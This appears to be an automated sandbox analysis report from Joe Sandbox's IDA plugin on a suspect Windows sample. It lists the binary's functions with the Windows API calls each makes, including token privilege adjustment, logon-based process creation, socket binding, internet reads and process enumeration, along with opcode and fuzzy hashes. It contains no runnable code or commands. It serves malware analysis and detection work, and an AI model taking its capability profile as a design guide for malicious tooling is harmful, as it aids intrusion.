Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 59da40ef5d6089820fd8456b4e5342910e3f85852c99fb2dae196f7f434dca1a
Instruction ID: 7bebd74cc4a6afab188427f5348a1a14470a6bc78285745f43274c6806a3baac
Opcode Fuzzy Hash: 59da40ef5d6089820fd8456b4e5342910e3f85852c99fb2dae196f7f434dca1a
Instruction Fuzzy Hash: 57219E316002149FCB10EF68C846B6EB7E9EF49720F15816EEC26AB3D1C774AD06CB95

Function 003E85B0 Relevance: 9.1, APIs: 6, Instructions: 61processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003E85E2
OpenProcessToken.ADVAPI32(00000000), ref: 003E85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003E85F8
CloseHandle.KERNEL32(00000004), ref: 003E8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003E8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 003E8646

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: bcd374ed3ee66571557bd0c558856f727d89dc424d21d9d0cbb1f534c7a5e11e
Instruction ID: 8e73b0e30421d15ec0fd0eeafcbc272ff058968caee5a0dbcff39578ee19888b
Opcode Fuzzy Hash: bcd374ed3ee66571557bd0c558856f727d89dc424d21d9d0cbb1f534c7a5e11e
Instruction Fuzzy Hash: DF113A72501149AFDF02CFA4DD48AEE7BA9EB48304F054165FE09A21A0C6729D65EB20

Function 003A5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 003B0DB6: std::exception::exception.LIBCMT ref: 003B0DEC
Part of subcall function 003B0DB6: __CxxThrowException@8.LIBCMT ref: 003B0E01

_memmove.LIBCMT ref: 003E0258
_memmove.LIBCMT ref: 003E036D
_memmove.LIBCMT ref: 003E0414

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 57a65c4a3eac3eb9a661a3302125189754dcaa57c7bc855db34b30aebd1d6110
Instruction ID: 301f3bd5be6afb043e9f01fb91a7cff1c5106840f7a67cfaf64c35395969f03f
Opcode Fuzzy Hash: 57a65c4a3eac3eb9a661a3302125189754dcaa57c7bc855db34b30aebd1d6110
Instruction Fuzzy Hash: C502CE70A00219DFCF0ADF65D981AAEBBB5EF45300F158069E80AEF395EB71D950CB91

Function 00391287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623

DefDlgProcW.USER32(?,?,?,?,?), ref: 003919FA
GetSysColor.USER32(0000000F), ref: 00391A4E
SetBkColor.GDI32(?,00000000), ref: 00391A61

Part of subcall function 00391290: DefDlgProcW.USER32(?,00000020,?), ref: 003912D8

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: bdcf7bb69ddeab8562429b7907111782a7de9157e2553f39d98e73f47b5c7342
Instruction ID: e32c69a9e94502a80cad6e6b04187f5b3ec822a5f624074820a10f8928cb5cc6
Opcode Fuzzy Hash: bdcf7bb69ddeab8562429b7907111782a7de9157e2553f39d98e73f47b5c7342
Instruction Fuzzy Hash: 09A19971102646BAEF2BAB298C95FBF355DDF42386F12011EF402F6592CB24DD4193BA

Function 003FBCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 003FBCE6
_wcscmp.LIBCMT ref: 003FBD16
_wcscmp.LIBCMT ref: 003FBD2B
FindNextFileW.KERNEL32(00000000,?), ref: 003FBD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 003FBD6C

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 380317254b23620d523a46f5963a6e006e3fe8ba222ffb8ee840b4dd966e410b
Instruction ID: a1dd1d63f043e1fcac653cf7dc797a265277f6078e7754556b42e12c127bcb85
Opcode Fuzzy Hash: 380317254b23620d523a46f5963a6e006e3fe8ba222ffb8ee840b4dd966e410b
Instruction Fuzzy Hash: EA51AE756046059FCB15DF28C490EAAF3E8EF49324F10462EFA568B3A1DB30ED04CB92

Function 00406747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00407D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00407DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0040679E
WSAGetLastError.WSOCK32(00000000), ref: 004067C7
bind.WSOCK32(00000000,?,00000010), ref: 00406800
WSAGetLastError.WSOCK32(00000000), ref: 0040680D
closesocket.WSOCK32(00000000,00000000), ref: 00406821

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 4e6ba07d63e4f9afcb0c1a82ebc83cf9a0b5ff5133c58571697c9c0a8fa806ef
Instruction ID: ec20e0d0bbefd5db7dfa0e10187842c0b186eb880f920cba6a59a45ae26599a5
Opcode Fuzzy Hash: 4e6ba07d63e4f9afcb0c1a82ebc83cf9a0b5ff5133c58571697c9c0a8fa806ef
Instruction Fuzzy Hash: 8141BE75A00210AFDF11BF288886F7E77E89B49714F04846EF91AAF3C2DA749D018792

Function 00415376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 004153C5
IsWindowEnabled.USER32 ref: 004153D3
GetForegroundWindow.USER32(?,?,00000001), ref: 004153E0
IsIconic.USER32 ref: 004153EE
IsZoomed.USER32 ref: 004153FC

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: cb7760ae1a3c5f225fc4590e2f71bfd972d8bd6e8e0b01f519c958eb0b9d0431
Instruction ID: 53fe419a1b7b9c14aa05ab31e440b4cc15112654f1286a5243c0b0da15179fd1
Opcode Fuzzy Hash: cb7760ae1a3c5f225fc4590e2f71bfd972d8bd6e8e0b01f519c958eb0b9d0431
Instruction Fuzzy Hash: 3D11C431300915AFDB216F26DC44BEFBB99EF857A1B40803AFC56D7241DB74DC4286A9

Function 003E80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003E80C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003E80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003E80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003E80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003E80F6

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: d9770b2a5ed096c1990ac5960fc96ee74bfbb9a495f4ed7329b7bd66f00e0225
Instruction ID: 7fa7f10fefd87b56bf46e3938403c08c442e8d1a9f730062102569aed25d4cda
Opcode Fuzzy Hash: d9770b2a5ed096c1990ac5960fc96ee74bfbb9a495f4ed7329b7bd66f00e0225
Instruction Fuzzy Hash: 40F0C270240214BFEB114FA6EC8CFA73FACEF49754B004139F909C21A0CB609D06DA60

Function 003FC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 003FC432
CoCreateInstance.OLE32(00422D6C,00000000,00000001,00422BDC,?), ref: 003FC44A

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

CoUninitialize.OLE32 ref: 003FC6B7

Strings

.lnk, xrefs: 003FC3C6, 003FC3EE, 003FC3F8

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 4a3c54970219041ce77b57568e6f8216c161355164a79101904531b437fa1a92
Instruction ID: 04b1f64fb9d3957b99bb4a90abfd4823f335c16a671c2fd9375919a70a3b0840
Opcode Fuzzy Hash: 4a3c54970219041ce77b57568e6f8216c161355164a79101904531b437fa1a92
Instruction Fuzzy Hash: 0EA15B71218205AFD701EF64C881EAFB7E8FF85354F00492DF1958B1A2EB71EA49CB52

Function 00394B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00394AD0), ref: 00394B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00394B57

Strings

GetNativeSystemInfo, xrefs: 00394B51
kernel32.dll, xrefs: 00394B40

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 1e0b87460f616c6e08be7cee4fe21d16ddbfe59ee30bf0778f73f9019aaa3a19
Instruction ID: 54a8d9d8170306f9e06a7d9ef0e9c2cf2b063babf11ea2f8f4d9b94a59e7149f
Opcode Fuzzy Hash: 1e0b87460f616c6e08be7cee4fe21d16ddbfe59ee30bf0778f73f9019aaa3a19
Instruction Fuzzy Hash: FED01234A14713DFDB209F31E818B8676E4AF05355B21C83A94C9D6554D774E8C5C658

Function 0040EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0040EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 0040EE4B

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

Process32NextW.KERNEL32(00000000,?), ref: 0040EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0040EF1A

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 52d62980a0ba4ede187f9dfe98b284e34487241fdbb15b34cf3935ab42ca903e
Instruction ID: d5cfcaf00fac9864dbd3d53e5e7f286cf33c3257dcddb16e962102755561b971
Opcode Fuzzy Hash: 52d62980a0ba4ede187f9dfe98b284e34487241fdbb15b34cf3935ab42ca903e
Instruction Fuzzy Hash: A9519071108311AFD711EF24CC82F6BB7E8EF94700F00482DF8959B2A1EB30A909CB96

Function 003EE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 003EE628

Strings

(, xrefs: 003EE66E
|, xrefs: 003EE658

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 900ef915de715d93dc05e8dff6cc8e6184ba6a753726e55779a850202369e311
Instruction ID: f8c8769c65f7786b23d15a78144da503bc8f7f553fcbbd1017786349e519c610
Opcode Fuzzy Hash: 900ef915de715d93dc05e8dff6cc8e6184ba6a753726e55779a850202369e311
Instruction Fuzzy Hash: 8C324675A007159FDB29CF19C4809AAB7F0FF48310B16C56EE89ADB7A1E770E941CB44

Function 004022EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0040180A,00000000), ref: 004023E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00402418

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 882a2190ff7d6980e791180aca00643ad9fe7c0fa039f3a1e938d67232e863dc
Instruction ID: 50c908c5dc4fc15aa2580ca09b9ccc8df93d0707ea1ae61750d7608ad17c8ad8
Opcode Fuzzy Hash: 882a2190ff7d6980e791180aca00643ad9fe7c0fa039f3a1e938d67232e863dc
Instruction Fuzzy Hash: A341F771904209BFEB109EA5DD89FBF77ACEB40314F10407FFA05B66C1DAB89E419658

Function 003FB333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 003FB343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003FB39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003FB3EA

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 90058b0f0c06e17e2261e855c91f4f90683cb034e1323e53034a4287259317be
Instruction ID: 7da9d38a97bc786205767f816f716d7b0e2f16af4d0f58b30d2bc890cce8d5f6
Opcode Fuzzy Hash: 90058b0f0c06e17e2261e855c91f4f90683cb034e1323e53034a4287259317be
Instruction Fuzzy Hash: 49215E75A00518EFCB01EFA5D881AEDFBB8FF49310F1480AAE905AB351DB319916CB54

Function 003E87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 003B0DB6: std::exception::exception.LIBCMT ref: 003B0DEC
Part of subcall function 003B0DB6: __CxxThrowException@8.LIBCMT ref: 003B0E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003E882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003E8858
GetLastError.KERNEL32 ref: 003E8865

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 27c97efc39a5ed9d3219766725ea51ea8099614a98f09e4456c3bf3fba611764
Instruction ID: 92eaa95389b16e567b2370c2538d29ca4deaf621be6e8eb292520349083cffa6
Opcode Fuzzy Hash: 27c97efc39a5ed9d3219766725ea51ea8099614a98f09e4456c3bf3fba611764
Instruction Fuzzy Hash: D7118FB2814204AFE719DFA5DC85D6BB7FCEB44714B20862EF85997651EB30BC418B60

Function 003E874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003E8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003E878B
FreeSid.ADVAPI32(?), ref: 003E879B

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 694450f05d5b405b2856550f9b46617b9fdb53b30005a1549b2466cfff63e490
Instruction ID: a6ca3a1ac36d1e7ed46e74b0d490c71ec9ccf89ab64c7796a166157f708b3831
Opcode Fuzzy Hash: 694450f05d5b405b2856550f9b46617b9fdb53b30005a1549b2466cfff63e490
Instruction Fuzzy Hash: 61F04975A1130CBFDF00DFF4DD89AEEBBBCEF08211F1085B9A901E2191E6716A488B54

Function 003F8889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 003F889B

Part of subcall function 003B520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,003F8F6E,00000000,?,?,?,?,003F911F,00000000,?), ref: 003B5213
Part of subcall function 003B520A: __aulldiv.LIBCMT ref: 003B5233

Strings

0eE, xrefs: 003F8892

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0eE
API String ID: 2893107130-3306559103
Opcode ID: cc993116954a7a20e16ac664edfd076e2a82850357cb13ff476ec469d5631994
Instruction ID: 62e1e1ff999e09bf238497a499c2bb364aac1bb28c0ca70e546eb2ebb95995b7
Opcode Fuzzy Hash: cc993116954a7a20e16ac664edfd076e2a82850357cb13ff476ec469d5631994
Instruction Fuzzy Hash: 3221A2326256148BC72ACF29D841A62B3E1EBA5311B698E6CD1F5CF2C1CA34A905CB54

Function 003FC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 003FC6FB
FindClose.KERNEL32(00000000), ref: 003FC72B

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 6244a1a982b8827e117d1e744e9e3d4197916efc5317fe47e5de91817f0b1806
Instruction ID: e3f879241bf0330858dabf6660114cf7af5dc2ec8e46836a47c4e2a25f96d08e
Opcode Fuzzy Hash: 6244a1a982b8827e117d1e744e9e3d4197916efc5317fe47e5de91817f0b1806
Instruction Fuzzy Hash: 521161726146049FDB10EF29D845A6AF7E9FF85324F00851EF9A9DB291DB30AC05CF81

Function 003FA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00409468,?,0041FB84,?), ref: 003FA097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00409468,?,0041FB84,?), ref: 003FA0A9

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

